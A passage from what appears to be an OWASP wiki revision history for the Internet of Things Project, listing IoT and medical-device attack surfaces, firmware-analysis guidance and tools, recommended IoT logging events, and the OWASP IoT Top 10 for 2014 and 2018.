{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255835OWASP Internet of Things Project2019-10-31T15:08:15Z<p>Aaron.guzman: .</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects separated into the following categories - Seek & Understand, Validate & Test, and Governance.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
